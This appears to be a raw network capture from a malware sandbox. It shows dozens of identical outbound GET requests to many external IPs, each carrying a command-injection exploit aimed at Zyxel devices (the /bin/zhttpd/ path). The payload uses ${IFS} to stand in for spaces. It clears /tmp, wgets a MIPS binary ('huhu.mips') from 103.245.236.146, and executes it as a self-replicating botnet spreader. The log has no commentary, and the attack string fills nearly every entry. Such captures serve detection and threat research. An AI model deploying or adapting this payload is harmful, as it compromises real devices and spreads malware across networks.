                                                Jan 29, 2024 07:08:04.687922955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8573192.168.2.235387269.231.35.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.687954903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8574192.168.2.235811449.29.25.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.688008070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8575192.168.2.2336374151.195.63.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.688023090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8576192.168.2.235301272.155.241.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.688055038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8577192.168.2.2339846199.155.202.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.688100100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8578192.168.2.235666279.162.115.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.678560972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8579192.168.2.2342628101.83.22.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.678715944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8580192.168.2.2341726223.152.182.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.678736925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8581192.168.2.2352576180.230.88.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.678766012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8582192.168.2.2341400121.221.32.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.678802967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8583192.168.2.234222696.45.29.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.678847075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8584192.168.2.234746894.36.236.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.678889990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8585192.168.2.2347452155.54.16.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.678941011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8586192.168.2.2345774190.32.69.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.678966045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8587192.168.2.233311679.33.113.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.678994894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8588192.168.2.2357134102.167.44.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679042101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8589192.168.2.233311440.143.178.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679081917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8590192.168.2.2335040139.154.249.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679141998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8591192.168.2.233597843.76.199.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679157972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8592192.168.2.235481014.155.78.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679240942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8593192.168.2.2356544149.130.183.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679269075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8594192.168.2.234492087.166.115.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679296017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8595192.168.2.235515471.64.56.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679404974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8596192.168.2.2348010139.164.131.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679435015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8597192.168.2.2360716201.139.133.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679474115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8598192.168.2.233844640.237.238.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679502964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8599192.168.2.235046857.143.54.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679543972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8600192.168.2.233681494.193.32.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679583073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8601192.168.2.233856662.150.87.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679629087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8602192.168.2.2359432128.118.52.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679656982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8603192.168.2.2352840103.85.88.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679709911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8604192.168.2.2337670217.222.60.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679754019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8605192.168.2.2345484154.19.164.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679790020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8606192.168.2.2346574129.242.244.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679816008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8607192.168.2.233535897.105.226.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679856062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8608192.168.2.2360642191.168.147.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679920912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8609192.168.2.2345902170.192.237.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679941893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8610192.168.2.236056265.250.233.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.679982901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8611192.168.2.2339424187.135.222.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680032015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8612192.168.2.2343164111.167.152.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680090904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8613192.168.2.2359474147.141.69.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680118084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8614192.168.2.235519865.219.32.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680135965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8615192.168.2.2351912144.170.199.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680174112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8616192.168.2.235356469.203.193.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680210114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8617192.168.2.235330866.150.113.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680275917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8618192.168.2.233994218.254.124.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680298090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8619192.168.2.2347456206.220.85.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680330992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8620192.168.2.2354396207.137.241.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680356979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8621192.168.2.234999836.207.57.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680389881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8622192.168.2.2345028107.201.234.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680432081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8623192.168.2.2342250223.160.65.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680479050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8624192.168.2.2345972202.82.120.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680517912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8625192.168.2.2339636203.142.136.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680563927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8626192.168.2.2336694156.165.228.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680610895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8627192.168.2.234042668.23.161.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680649042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8628192.168.2.233680041.62.17.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680685043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8629192.168.2.2358922195.230.23.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680727959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8630192.168.2.234709693.39.140.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680763960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8631192.168.2.2355128135.20.162.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680830956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8632192.168.2.234021475.22.229.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680890083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8633192.168.2.2339474177.60.226.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680927038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8634192.168.2.2360784130.119.142.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680953979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8635192.168.2.2344498143.161.39.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.680993080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8636192.168.2.2349532152.83.189.155443
                                                TimestampBytes transferredDirectionData
